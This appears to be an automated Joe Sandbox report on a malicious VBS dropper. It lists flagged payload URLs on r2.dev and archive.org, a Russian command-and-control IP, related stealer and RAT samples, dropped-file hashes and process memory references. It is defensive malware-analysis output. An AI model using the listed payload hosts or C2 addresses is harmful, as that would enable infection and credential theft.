              ia600100.us.archive.org
              207.241.227.240
              truefalseunknown
              pub-26ee9be236b54d0cb1b570a203543b93.r2.dev
              162.159.140.237
              truetrueunknown
              NameMaliciousAntivirus DetectionReputation
              https://pub-26ee9be236b54d0cb1b570a203543b93.r2.dev/onye.txttrueunknown
              https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtfalseunknown
              109.248.151.156trueunknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://nuget.org/NuGet.exepowershell.exe, 00000004.00000002.1399989665.000001B2A447C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1415526929.000001B2B2B99000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000004.00000002.1399989665.000001B2A4290000.00000004.00000800.00020000.00000000.sdmpfalseunknown
              http://www.mozilla.com/en-US/blocklist/mozglue.dll.5.drfalseunknown
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.1399989665.000001B2A2D42000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.1399989665.000001B2A2D42000.00000004.00000800.00020000.00000000.sdmpfalseunknown
              https://go.micropowershell.exe, 00000004.00000002.1399989665.000001B2A3B9C000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://ocsp.thawte.com0AddInProcess32.exe, 00000005.00000002.2629588584.0000000004502000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631215858.0000000004920000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2635422321.0000000004FD2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2629190725.0000000004470000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, softokn3.dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.drfalse
              • URL Reputation: safe
              unknown
              https://contoso.com/Licensepowershell.exe, 00000004.00000002.1415526929.000001B2B2B99000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://ia600100.uspowershell.exe, 00000004.00000002.1399307336.000001B2A0BB0000.00000004.00000020.00020000.00000000.sdmptrueunknown
              https://pub-26ee9be236b54d0cb1b570a203543b93.r2.devpowershell.exe, 00000004.00000002.1399989665.000001B2A2F57000.00000004.00000800.00020000.00000000.sdmptrueunknown
              http://www.mozilla.com0AddInProcess32.exe, 00000005.00000002.2629588584.0000000004502000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631215858.0000000004920000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2635422321.0000000004FD2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2629190725.0000000004470000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, softokn3.dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.drfalse
                unknown
                https://contoso.com/Iconpowershell.exe, 00000004.00000002.1415526929.000001B2B2B99000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                unknown
                https://ia600100.us.arXpowershell.exe, 00000004.00000002.1399989665.000001B2A3B9C000.00000004.00000800.00020000.00000000.sdmpfalse
                  unknown
                  http://crl.rootca1.amazontrust.com/rootca1.crl0AddInProcess32.exe, 00000005.00000002.2639138695.0000000005397000.00000004.00001000.00020000.00000000.sdmpfalseunknown
                  https://aka.ms/pscore6powershell.exe, 00000002.00000002.1453682043.0000018D59FDD000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  unknown
                  http://ocsp.rootca1.amazontrust.com0:AddInProcess32.exe, 00000005.00000002.2639138695.0000000005397000.00000004.00001000.00020000.00000000.sdmpfalse
                    unknown
                    https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtYSD;dk7base64Contentpowershell.exe, 00000004.00000002.1399989665.000001B2A2D42000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.1399989665.000001B2A2D42000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                    https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtYSD;$base64Contentpowershell.exe, 00000004.00000002.1399989665.000001B2A3B9C000.00000004.00000800.00020000.00000000.sdmpfalse
                      unknown
                      https://github.com/syohex/java-simple-mine-sweeperAddInProcess32.exefalseunknown
                      http://crl.thawte.com/ThawteTimestampingCA.crl0AddInProcess32.exe, 00000005.00000002.2629588584.0000000004502000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631215858.0000000004920000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2635422321.0000000004FD2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2631497769.0000000004D7D000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2629190725.0000000004470000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.5.dr, softokn3.dll.5.dr, freebl3.dll.5.dr, mozglue.dll.5.drfalse
                      • URL Reputation: safe
                      unknown
                      http://x1.c.lencr.org/0AddInProcess32.exe, 00000005.00000002.2639138695.0000000005397000.00000004.00001000.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://x1.i.lencr.org/0AddInProcess32.exe, 00000005.00000002.2639138695.0000000005397000.00000004.00001000.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://contoso.com/powershell.exe, 00000004.00000002.1415526929.000001B2B2B99000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.1399989665.000001B2A447C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1415526929.000001B2B2B99000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://crt.rootca1.amazontrust.com/rootca1.cer0?AddInProcess32.exe, 00000005.00000002.2639138695.0000000005397000.00000004.00001000.00020000.00000000.sdmpfalseunknown
                      http://pub-26ee9be236b54d0cb1b570a203543b93.r2.devpowershell.exe, 00000004.00000002.1399989665.000001B2A3135000.00000004.00000800.00020000.00000000.sdmptrueunknown
                      https://oneget.orgXpowershell.exe, 00000004.00000002.1399989665.000001B2A4290000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://ia600100.us.archive.orgpowershell.exe, 00000004.00000002.1399989665.000001B2A3B9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1399989665.000001B2A2D42000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      https://aka.ms/pscore68powershell.exe, 00000002.00000002.1453682043.0000018D5A044000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1399989665.000001B2A2B21000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://github.com/syohex/java-simple-mine-sweeperC:powershell.exe, 00000004.00000002.1399989665.000001B2A315C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1415526929.000001B2B2DE3000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000005.00000002.2626601197.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalseunknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.1453682043.0000018D5A059000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1399989665.000001B2A2B21000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://oneget.orgpowershell.exe, 00000004.00000002.1399989665.000001B2A4290000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://ia600100.us.archive.orgpowershell.exe, 00000004.00000002.1399989665.000001B2A4249000.00000004.00000800.00020000.00000000.sdmpfalseunknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      162.159.140.237
                      pub-26ee9be236b54d0cb1b570a203543b93.r2.devUnited States
                      13335CLOUDFLARENETUStrue
                      207.241.227.240
                      ia600100.us.archive.orgUnited States
                      7941INTERNET-ARCHIVEUSfalse
                      109.248.151.156
                      unknownRussian Federation
                      52048DATACLUBLVtrue
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1523823
                      Start date and time:2024-10-02 05:22:10 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 7m 53s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:10
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:89SkYNNpdi.vbs
                      renamed because original name is a hash value
                      Original Sample Name:3ca2d0a1abba4f885e740032d2314993fac09ffffe14a4c6a89aacf65684e45b.vbs
                      Detection:MAL
                      Classification:mal100.phis.troj.spyw.expl.evad.winVBS@8/15@2/3
                      EGA Information:
                      • Successful, ratio: 33.3%
                      HCA Information:
                      • Successful, ratio: 97%
                      • Number of executed functions: 130
                      • Number of non-executed functions: 299
                      Cookbook Comments:
                      • Found application associated with file extension: .vbs
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                      • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target powershell.exe, PID 1352 because it is empty
                      • Execution Graph export aborted for target powershell.exe, PID 7816 because it is empty
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                      TimeTypeDescription
                      23:23:10API Interceptor45x Sleep call for process: powershell.exe modified
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      162.159.140.237http://pub-0ae50a4c573c409f93585499aeac650f.r2.dev/cvbnmkjh.htmlGet hashmaliciousHTMLPhisherBrowse
                      • pub-0ae50a4c573c409f93585499aeac650f.r2.dev/cvbnmkjh.html
                      http://pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.htmlGet hashmaliciousHTMLPhisherBrowse
                      • pub-7c9ee239002440a79f4b2c5934b13627.r2.dev/higher.html
                      http://pub-ca8a3ace07094ee9967971c12a96a935.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                      • pub-ca8a3ace07094ee9967971c12a96a935.r2.dev/index.html
                      http://pub-6f594b43277e4071a0c14266387a1ea8.r2.dev/fdsaghjk.htmlGet hashmaliciousHTMLPhisherBrowse
                      • pub-6f594b43277e4071a0c14266387a1ea8.r2.dev/fdsaghjk.html
                      http://pub-d2dba8f127424f0cb0341658081256fa.r2.dev/kjhdishs.htmlGet hashmaliciousHTMLPhisherBrowse
                      • pub-d2dba8f127424f0cb0341658081256fa.r2.dev/kjhdishs.html
                      http://pub-64fd1e2750a4440ab4fe49fc5a421a35.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                      • pub-64fd1e2750a4440ab4fe49fc5a421a35.r2.dev/index.html
                      http://pub-72f4175190054b068a6db1f116f55ca9.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                      • pub-72f4175190054b068a6db1f116f55ca9.r2.dev/index.html
                      http://pub-9a2fba40e7084a1eb9d96885ba6cecf2.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                      • pub-9a2fba40e7084a1eb9d96885ba6cecf2.r2.dev/index.html
                      http://pub-a5dea08759934238bd2363b86fdeed1a.r2.dev/makinsalin.htmlGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                      • pub-a5dea08759934238bd2363b86fdeed1a.r2.dev/makinsalin.html
                      http://pub-783fdf92836240fa96dda87e23c5c881.r2.dev/index.htmlGet hashmaliciousHTMLPhisherBrowse
                      • pub-783fdf92836240fa96dda87e23c5c881.r2.dev/index.html
                      207.241.227.240qiEmGNhUij.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                        ZJbugHcHda.vbsGet hashmaliciousPureLog StealerBrowse
                          0BO4n723Q8.vbsGet hashmaliciousPureLog StealerBrowse
                            PofaABvatI.vbsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                              SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtfGet hashmaliciousPureLog StealerBrowse
                                RFQ 2024.09.26-89 vivecta.vbsGet hashmaliciousPureLog StealerBrowse
                                  AGMETIGA zapytanie ofertowe.xlsGet hashmaliciousPureLog StealerBrowse
                                    sostener.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                      asegurar.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                        SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                          109.248.151.15617265837652d55c0f124ae83612d8bd5caa1d7f12d178ec09d2162f830ec997362a0f3d454121.dat-decoded.exeGet hashmaliciousAveMaria, PrivateLoaderBrowse
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            pub-26ee9be236b54d0cb1b570a203543b93.r2.devPofaABvatI.vbsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 162.159.140.237
                                            mitec_purchase_order_PDF (1).vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                            • 172.66.0.235
                                            REQUEST FOR QUOTATION.jsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                            • 172.66.0.235
                                            Company profile.jsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                            • 162.159.140.237
                                            Quote_Request.jsGet hashmaliciousPureLog StealerBrowse
                                            • 172.66.0.235
                                            Enquiry.jsGet hashmaliciousPureLog StealerBrowse
                                            • 172.66.0.235
                                            Purchase Order.jsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                            • 162.159.140.237
                                            RFQ.vbsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                            • 162.159.140.237
                                            HONG_KONG_CHEMHERE_QUOTE_REQUEST.vbsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                            • 104.18.3.35
                                            Data-Sheet.jsGet hashmaliciousUnknownBrowse
                                            • 104.18.3.35
                                            ia600100.us.archive.orgqiEmGNhUij.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                                            • 207.241.227.240
                                            ZJbugHcHda.vbsGet hashmaliciousPureLog StealerBrowse
                                            • 207.241.227.240
                                            0BO4n723Q8.vbsGet hashmaliciousPureLog StealerBrowse
                                            • 207.241.227.240
                                            PofaABvatI.vbsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 207.241.227.240
                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtfGet hashmaliciousPureLog StealerBrowse
                                            • 207.241.227.240
                                            RFQ 2024.09.26-89 vivecta.vbsGet hashmaliciousPureLog StealerBrowse
                                            • 207.241.227.240
                                            AGMETIGA zapytanie ofertowe.xlsGet hashmaliciousPureLog StealerBrowse
                                            • 207.241.227.240
                                            sostener.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 207.241.227.240
                                            asegurar.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 207.241.227.240
                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtfGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 207.241.227.240
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            CLOUDFLARENETUSfile.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                            • 172.67.184.196
                                            qiEmGNhUij.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                                            • 188.114.96.3
                                            PofaABvatI.vbsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 162.159.140.237
                                            mitec_purchase_order_PDF (1).vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                            • 172.66.0.235
                                            http://lamourskinclinic.com.auGet hashmaliciousUnknownBrowse
                                            • 104.18.10.207
                                            https://unpaidrefund.top/view/mygovGet hashmaliciousHTMLPhisherBrowse
                                            • 188.114.96.3
                                            payment copy.exeGet hashmaliciousFormBookBrowse
                                            • 23.227.38.74
                                            DHL Shipping documents 0020398484995500.exeGet hashmaliciousAgentTeslaBrowse
                                            • 104.26.12.205
                                            https://docs.google.com/presentation/d/e/2PACX-1vRuKBrQqA6BNfxZo0BAmhaaVHWHS5xGpGnvHJ3KKWtc6LdsEuOoWSlBNaOKZjp5GXLjhWJKRMb-grou/pub?start=false&loop=false&delayms=3000Get hashmaliciousUnknownBrowse
                                            • 104.21.46.216
                                            https://sanbernardinoscounty.telcom-info.com/Get hashmaliciousHtmlDropperBrowse
                                            • 104.21.55.67
                                            INTERNET-ARCHIVEUSqiEmGNhUij.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                                            • 207.241.227.240
                                            ZJbugHcHda.vbsGet hashmaliciousPureLog StealerBrowse
                                            • 207.241.227.240
                                            0BO4n723Q8.vbsGet hashmaliciousPureLog StealerBrowse
                                            • 207.241.227.240
                                            PofaABvatI.vbsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 207.241.227.240
                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.29427.26024.rtfGet hashmaliciousPureLog StealerBrowse
                                            • 207.241.227.240
                                            SecuriteInfo.com.Exploit.CVE-2017-11882.123.22759.7388.rtfGet hashmaliciousRemcosBrowse
                                            • 207.241.227.96
                                            RFQ 2024.09.26-89 vivecta.vbsGet hashmaliciousPureLog StealerBrowse
                                            • 207.241.227.240
                                            AGMETIGA zapytanie ofertowe.xlsGet hashmaliciousPureLog StealerBrowse
                                            • 207.241.227.240
                                            REQUEST FOR QUOTATION.jsGet hashmaliciousPXRECVOWEIWOEI Stealer, PureLog StealerBrowse
                                            • 207.241.235.61
                                            sostener.vbsGet hashmaliciousRemcos, PureLog StealerBrowse
                                            • 207.241.227.240
                                            DATACLUBLVfile.exeGet hashmaliciousUnknownBrowse
                                            • 46.183.218.37
                                            file.exeGet hashmaliciousUnknownBrowse
                                            • 46.183.218.37
                                            POandSpecs.exeGet hashmaliciousXenoRATBrowse
                                            • 84.38.132.74
                                            hJm4BAWmD2.exeGet hashmaliciousXenoRATBrowse
                                            • 109.248.150.213
                                            EIirQiZnX9.imgGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • 109.248.150.159
                                            17265837652d55c0f124ae83612d8bd5caa1d7f12d178ec09d2162f830ec997362a0f3d454121.dat-decoded.exeGet hashmaliciousAveMaria, PrivateLoaderBrowse
                                            • 109.248.151.156
                                            file.exeGet hashmaliciousGuLoaderBrowse
                                            • 46.183.220.28
                                            file.exeGet hashmaliciousGuLoaderBrowse
                                            • 46.183.220.28
                                            3TpW2Sn68z.exeGet hashmaliciousRemcosBrowse
                                            • 84.38.132.103
                                            1q4wVJgStc.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                            • 46.183.223.107
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            3b5074b1b5d032e5620f69f9f700ff0eqiEmGNhUij.vbsGet hashmaliciousAsyncRAT, DcRat, PureLog StealerBrowse
                                            • 162.159.140.237
                                            • 207.241.227.240
                                            2THp7fwNQD.vbsGet hashmaliciousUnknownBrowse
                                            • 162.159.140.237
                                            • 207.241.227.240
                                            iJEK0xwucj.vbsGet hashmaliciousUnknownBrowse
                                            • 162.159.140.237
                                            • 207.241.227.240
                                            ZJbugHcHda.vbsGet hashmaliciousPureLog StealerBrowse
                                            • 162.159.140.237
                                            • 207.241.227.240
                                            0BO4n723Q8.vbsGet hashmaliciousPureLog StealerBrowse
                                            • 162.159.140.237
                                            • 207.241.227.240
                                            PofaABvatI.vbsGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                            • 162.159.140.237
                                            • 207.241.227.240
                                            file.exeGet hashmaliciousCredential FlusherBrowse
                                            • 162.159.140.237
                                            • 207.241.227.240
                                            mitec_purchase_order_PDF (1).vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                            • 162.159.140.237
                                            • 207.241.227.240
                                            DHL Shipping documents 0020398484995500.exeGet hashmaliciousAgentTeslaBrowse
                                            • 162.159.140.237
                                            • 207.241.227.240
                                            http://tvsurf.jp/Get hashmaliciousUnknownBrowse
                                            • 162.159.140.237
                                            • 207.241.227.240
                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            C:\Users\user\AppData\Local\Temp\mozglue.dll17265837652d55c0f124ae83612d8bd5caa1d7f12d178ec09d2162f830ec997362a0f3d454121.dat-decoded.exeGet hashmaliciousAveMaria, PrivateLoaderBrowse
                                              BqM3S4dN0J.exeGet hashmaliciousAveMaria, PrivateLoader, UACMeBrowse
                                                Julcbozqsvtzlo.cmdGet hashmaliciousRemcos, AveMaria, DBatLoader, PrivateLoader, UACMeBrowse
                                                  Nordsee Energy Project _Firm RFQ_KE-24826.exeGet hashmaliciousAveMaria, PrivateLoader, UACMeBrowse
                                                    ORDER883274777724884pdf.vbsGet hashmaliciousAveMaria, PrivateLoaderBrowse
                                                      17194198846f19431fa86ff695fe063dadb4561f59dac5dc011432c27d123f4314e8bbacda424.dat-decoded.exeGet hashmaliciousAveMaria, PrivateLoaderBrowse
                                                        8x121Y7FNW.jsGet hashmaliciousAveMaria, PrivateLoaderBrowse
                                                          e9d0af516a8d65649c6850b69ff15e65cba280f8d44dbc505882dd16cf922320_dump.exeGet hashmaliciousAveMaria, PrivateLoader, UACMeBrowse
                                                            filedoc3720001.exeGet hashmaliciousAveMaria, PrivateLoader, UACMeBrowse
                                                              6aa115e03c3a0a7a2e8b8122c4c484263dc004c6b1f168b98922d89d6570a6e4_payload.exeGet hashmaliciousAveMaria, UACMeBrowse
                                                                C:\Users\user\AppData\Local\Temp\freebl3.dll17265837652d55c0f124ae83612d8bd5caa1d7f12d178ec09d2162f830ec997362a0f3d454121.dat-decoded.exeGet hashmaliciousAveMaria, PrivateLoaderBrowse
                                                                  BqM3S4dN0J.exeGet hashmaliciousAveMaria, PrivateLoader, UACMeBrowse
                                                                    Julcbozqsvtzlo.cmdGet hashmaliciousRemcos, AveMaria, DBatLoader, PrivateLoader, UACMeBrowse
                                                                      Nordsee Energy Project _Firm RFQ_KE-24826.exeGet hashmaliciousAveMaria, PrivateLoader, UACMeBrowse
                                                                        ORDER883274777724884pdf.vbsGet hashmaliciousAveMaria, PrivateLoaderBrowse
                                                                          17194198846f19431fa86ff695fe063dadb4561f59dac5dc011432c27d123f4314e8bbacda424.dat-decoded.exeGet hashmaliciousAveMaria, PrivateLoaderBrowse
                                                                            8x121Y7FNW.jsGet hashmaliciousAveMaria, PrivateLoaderBrowse
                                                                              e9d0af516a8d65649c6850b69ff15e65cba280f8d44dbc505882dd16cf922320_dump.exeGet hashmaliciousAveMaria, PrivateLoader, UACMeBrowse
                                                                                filedoc3720001.exeGet hashmaliciousAveMaria, PrivateLoader, UACMeBrowse
                                                                                  6aa115e03c3a0a7a2e8b8122c4c484263dc004c6b1f168b98922d89d6570a6e4_payload.exeGet hashmaliciousAveMaria, UACMeBrowse
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):64
                                                                                    Entropy (8bit):1.1940658735648508
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:NlllulL4w/l/lZ:NllUMwl/
                                                                                    MD5:5E4245540CA0496B6A4E15149DB9B371
                                                                                    SHA1:6F912443CDFD9F0C474E2ACC755E982C5E3CF8BB
                                                                                    SHA-256:6892D98C8FEF52384104FB8712A0E1DA43C1B5CA8E7E32CF33200354E2FBC522
                                                                                    SHA-512:1E61844BED5A7A30C6DE358CC6E351FFE6F783F27B5FAC2C4E71C2F9047D84C396C91E2B3264F043D03C41AAB179C7ADD3408AD68C966C1299827363DC3AF4B0
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:@...e................................................@..........
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Reputation:high, very likely benign file
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Reputation:high, very likely benign file
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):60
                                                                                    Entropy (8bit):4.038920595031593
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                    Malicious:false
                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):334288
                                                                                    Entropy (8bit):6.806904510927404
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:u8YBC2NpfYjGg7t5xb7WOBOLFwh8yGHrIrvqqDL6XPbjm:ubG7F35BVh8yIZqn6vm
                                                                                    MD5:EF12AB9D0B231B8F898067B2114B1BC0
                                                                                    SHA1:6D90F27B2105945F9BB77039E8B892070A5F9442
